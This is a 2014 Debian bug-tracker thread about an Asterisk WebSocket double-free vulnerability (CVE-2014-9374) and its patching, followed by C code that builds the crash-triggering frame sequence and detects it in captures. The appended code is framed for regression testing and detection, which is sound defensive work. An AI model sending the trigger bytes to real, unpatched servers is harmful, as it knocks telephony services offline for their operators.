On Mon, Dec 15, 2014 at 09:26:41PM +0100, Salvatore Bonaccorso wrote:
> Source: asterisk
> Version: 1:11.13.0~dfsg-1
> Severity: important
> Tags: security upstream fixed-upstream
> 
> Hi,
> 
> the following vulnerability was published for asterisk.
> 
> CVE-2014-9374[0]:
> | Double free vulnerability in the WebSocket Server (res_http_websocket
> | module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2,
> | and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9
> | allows remote attackers to cause a denial of service (crash) by sending
> | a zero length frame after a non-zero length frame.
> 
> No description was found (try on a search engine)
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2014-9374
Upstream's page: http://downloads.asterisk.org/pub/security/AST-2014-019.html

1.8 doesn't have websocket support and thus is not vulnerable.

Patches for this and the previous issues are now finally committed to git
(branch wheezy). Sadly I'll have to use t-p-u as Unstable has Asterisk 13
due to my miscalculation.

-- 
Tzafrir Cohen         icq#16849755          jabber:tzafrir.co...@xorcom.com
+972-50-7952406           mailto:tzafrir.co...@xorcom.com
http://www.xorcom.com
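The CVE text quoted in this thread names the trigger only as "a zero length frame after a non-zero length frame". The C below is an added example, not part of the thread and not Asterisk's res_http_websocket code: it encodes masked client-to-server frames per RFC 6455, builds exactly that two-frame ordering (useful as input for a regression test against a patched build), and scans a captured byte stream for the same ordering while refusing to report a truncated capture as clean. The function names, the mask key 0x12345678 and the "hello" payload are constructed for this example and say nothing about how the double free arises inside Asterisk.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define WS_OP_TEXT 0x1

typedef struct {
    int fin, masked;
    uint8_t opcode;
    uint64_t len;       /* payload length announced by the header */
    size_t header_len;  /* bytes before the payload, mask key included */
} ws_hdr;

/* Encode one masked client-to-server frame (RFC 6455, section 5.2). Payloads
 * above 65535 bytes are rejected to keep the example short. Returns bytes
 * written, or 0 on overflow/rejection. */
size_t ws_encode_masked(uint8_t *out, size_t outlen, uint8_t opcode,
                        const uint8_t *payload, size_t len, const uint8_t key[4])
{
    size_t ext = len > 125 ? 2 : 0, i = 2;
    if (len > 65535 || outlen < 2 + ext + 4 + len)
        return 0;
    out[0] = 0x80 | (opcode & 0x0f);                 /* FIN set, unfragmented */
    out[1] = 0x80 | (uint8_t)(ext ? 126 : len);      /* MASK bit + 7-bit length */
    if (ext) {
        out[i++] = (uint8_t)(len >> 8);
        out[i++] = (uint8_t)len;
    }
    memcpy(out + i, key, 4);
    i += 4;
    for (size_t j = 0; j < len; j++)                 /* payload XOR mask key */
        out[i + j] = payload[j] ^ key[j % 4];
    return i + len;
}

/* Parse a frame header without touching the payload. Returns 0 on success,
 * -1 if the input is shorter than the header it announces. */
int ws_parse_header(const uint8_t *in, size_t inlen, ws_hdr *h)
{
    if (inlen < 2)
        return -1;
    h->fin = (in[0] & 0x80) != 0;
    h->opcode = in[0] & 0x0f;
    h->masked = (in[1] & 0x80) != 0;
    uint64_t len = in[1] & 0x7f;
    size_t i = 2, ext = len == 126 ? 2 : len == 127 ? 8 : 0;
    if (inlen < i + ext + (h->masked ? 4 : 0))
        return -1;
    if (ext) {                                       /* extended length, big-endian */
        len = 0;
        for (size_t k = 0; k < ext; k++)
            len = (len << 8) | in[i + k];
        i += ext;
    }
    if (h->masked)
        i += 4;
    h->len = len;
    h->header_len = i;
    return 0;
}

/* Walk a buffer of complete frames and count zero-length frames that directly
 * follow a non-zero-length frame, the ordering the CVE text names as the
 * trigger. Returns -1 if a frame is truncated or claims more payload than
 * remains, so a malformed capture is never reported as clean. */
int ws_count_zero_after_nonzero(const uint8_t *buf, size_t n)
{
    size_t off = 0;
    int hits = 0, prev_nonzero = 0;
    while (off < n) {
        ws_hdr h;
        if (ws_parse_header(buf + off, n - off, &h) != 0)
            return -1;
        if (h.len > n - off - h.header_len)
            return -1;
        if (h.len == 0 && prev_nonzero)
            hits++;
        prev_nonzero = h.len > 0;
        off += h.header_len + (size_t)h.len;
    }
    return hits;
}

/* Build the two-frame sequence from the CVE text: a masked text frame with a
 * short payload, then a masked zero-length text frame. Mask key and payload
 * are constructed values for this example. Returns total bytes, 0 on overflow. */
size_t ws_build_trigger_sequence(uint8_t *out, size_t outlen)
{
    static const uint8_t key[4] = { 0x12, 0x34, 0x56, 0x78 };
    static const uint8_t msg[] = "hello";
    size_t n = ws_encode_masked(out, outlen, WS_OP_TEXT, msg, 5, key);
    if (n == 0)
        return 0;
    size_t m = ws_encode_masked(out + n, outlen - n, WS_OP_TEXT, NULL, 0, key);
    return m == 0 ? 0 : n + m;
}
```

ws_build_trigger_sequence() yields 17 bytes: an 11-byte frame (0x81 0x85, key, five masked payload bytes) followed by a 6-byte frame (0x81 0x80, key). Frames sent to a server must be masked, which is why the zero-length frame still carries a 4-byte key; ws_count_zero_after_nonzero() reports 1 for that buffer and -1 if the capture is cut short anywhere inside a frame.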